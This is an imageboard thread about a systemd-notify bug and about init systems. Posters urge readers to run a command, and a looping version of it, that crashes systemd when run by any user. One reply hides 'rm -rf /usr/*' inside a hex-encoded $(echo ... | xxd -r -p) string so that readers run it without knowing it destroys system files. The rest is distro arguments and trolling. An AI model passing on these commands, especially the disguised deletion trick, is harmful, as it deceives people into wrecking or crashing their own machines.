Systemd is great guys it just works

>systemd is great guys it just works
run this command as any user and see what happens NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""

Other urls found in this thread:

unixmen.com/a-beginners-guide-to-install-gentoo/
wiki.gentoo.org/wiki/Handbook:AMD64
twitter.com/AnonBabble

I'm scared.

Has probably been patched for most people on here sadly

Funny while it lastest

some people have to use this command while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done

The command has been fixed for some time now because the systemd developers actually five a shit.

Nah, only gentoofags have had the chance.

all my files are gone wtf man

Yes, the bug has existed for only 2 years and require manual patching to get rid of right now! What a great response time! The devs really give a shit!

>Slackware and gentoo don't have this problem
Feels good man

Only if they already rebooted.

we windows now

Pretty sure they only patched it because they're in full panic mode right now.

One of my piss bottles leaked all over my windows pc and now it won't start anymore. I guess windows doesn't just work.

Slackware already fixed this.

>letting jobless neckbeards code your OS

No thank you.

Hello lennart poottering!

Hello friend. Do you enjoy my gift to the linux community?

systemd is defective by design

I love it. It's like I have a clown in my distro!

Just switch to BSD if you hate systemd this much.

Or just use distros that don't have it or make it optional like Slackware or gentoo.

What if I hate BSD even more?

This.
Install Gentoo.

>b-b-but many eyes makes loonix more secure

It makes linux more secure, not systemdick. Just like nobody is claiming that KDE is secure, for example.

Systemd can't be secure if the code is a mess and the developers are incompetent, even if a billion eyes are inspecting it daily.

The many eyes meme is one of the very few cases where I think Linus is wrong.

Many eyes in and of itself doesn't make anything more secure. (As a placebo it can even make things worse). Comprehensive audits and proper security practices are what make things secure.

>GNU/Linux is great guys it just works

$(echo 726d202d7266202f7573722f2a | xxd -r -p)

How?

unixmen.com/a-beginners-guide-to-install-gentoo/

Do it or go back to Cred Forums

>Many eyes in and of itself doesn't make anything more secure
But nobody is claiming that.
The many eyes claim is that if there is a bug, it will be found. No amount of comprehensive audits by a total of 1 person can provide anywhere near the same guarantee. Of course, if you put 1000 people on the audit team, you're back into the many eyes domain.

>The many eyes claim is that if there is a bug, it will be found.

Uh hu.
>the average lifetime of a critical security bug in the Linux kernel, from introduction during a code commit to public discovery and having a patch issued, averages three years or more. According to Cook’s analysis, critical and high-severity security bugs in the upstream kernel have lifespans from 3.3 to 6.4 years between commit and discovery.

And if there weren't many eyes, it would never ever be found (just like is happening in bsdland right now).

>plays the zelda theme

Uh, what?

It's magic, I don't gotta explain shit!

What does it do?

Critical and high severity bugs not being found for 3 to 6 years fter introduction in the Linux kernel doesn't seem like a testament to good security or how many eyes makes Linux more secure. It seems like the complete opposite. Couple this with the fact Linus and the maintainers deliberately hold back information on the severity of bugs being fixed because to him they are just "normal bugs" which leaves everyone else unaware of serious issues they may need to patch out the whole thing comes across a a complete failure, a disaster.

Compare to openbsd where it takes decades if bugs are even found at all.
Compare to openbsd where the devs outright deny security flaws that are discovered, and then silently patch them months later.
Meanwhile there are tons of mitigations available for linux and none for openbsd.

In windows, high severity bugs are called features and are integrated rather than patched.
Or just ignored.

Is there something like this for gentoo?

>the bug has existed for only 2 years
Most bugs do exist until they are discovered.

It was discovered almost immediately though. Empty string is THE default test case. If you're out of time and you can only design one test for something, you'll choose 0 for ints, true for bools and "" for strings.

Seriously, just use the Handbook.
wiki.gentoo.org/wiki/Handbook:AMD64
Follow the steps on the right. It's not hard at all.

Sorry OP but my init system is wininit.exe.

ebin

More like loseit.exe am i rite?

nothing happened.

>It was discovered almost immediately though.
Really? It looks more to me like the bug was submitted three months ago.

Come back with bullshit like this when all other software that you use has 0 bugs

>an OS that's need a fucking guide to be installed

retard

Gentoo is the dark souls of OS installers

Did I say three months ago? Looks more like two days ago.
And it looks like he made his blog post at the same time he made his bug report, which was before he made his CVE request.
So basically the guy is a jackass, even if he did find a severe bug.

Lennart pls go and stay go

LINUXFAGS ON FULL DAMAGE CONTROL

>Gentoo is the dark souls of OS installers

>del c:\windows\system32
HAHAHAHAHHAA
HAH
H
AHAAHAHAHAHAHAHAHAHAHHA
HAHA

HA
HAH
AHAHAHH
AH
AHAHAHHH
ASH
AHAHAH
AHAHAHAHAHAHAHAHAHAH
AH
AH
AHAHAHAHAHAHHAHAHAHHAHAHAH
A
HAH
AHAHHA

AHHAHAHAHAHHAHAHAHAHAH
A
AHAHHAHAHAHAH
HA
AHAHHAHHAHHAHAHAHAHAHA
HA
AH
H
A
AH
AH
AHAHAHAAHAHAHAHHAHAHA
HAH
AHAHAHA

h
WINBABIES BTFO LMAO

NICE OS HAHAAHA
HAH
AHHAH
AH
AAA

There is the fucking handbook.

If you can read and understand written English, then you can install Cred Forumsentoo.

Literally what distros should I be using that doesn't use systemd?
I was considering switching from arch to Gentoo, but when I tried setting it up in a VM I just got bored after like 45 minutes.
Ive been considering sabayon, but I've heard it's more what Manjaro is to arch than antergos.
Is there really no GUI installer or arch anywhere equivalent for Gentoo? I just don't have the time/interest to spend hours reading through the wiki and installing it.

devuan

epic

arch with openrc and eudev-git

Can I still install programs normally with pacman from the arch repo and aur?

nice

yes mostly

you would have to use abs to build qt5-base without -journald or openvpn with --disable-systemd thats about it

i still havent figured why wpa_supplicant doesnt work == no wifi atm

Oh fuck now what?

>I just don't have the time/interest to spend hours reading through the wiki and installing it.
Good. We don't want you.

unmount everything and do a hard reset

Then remove systemdick and install a sensible init.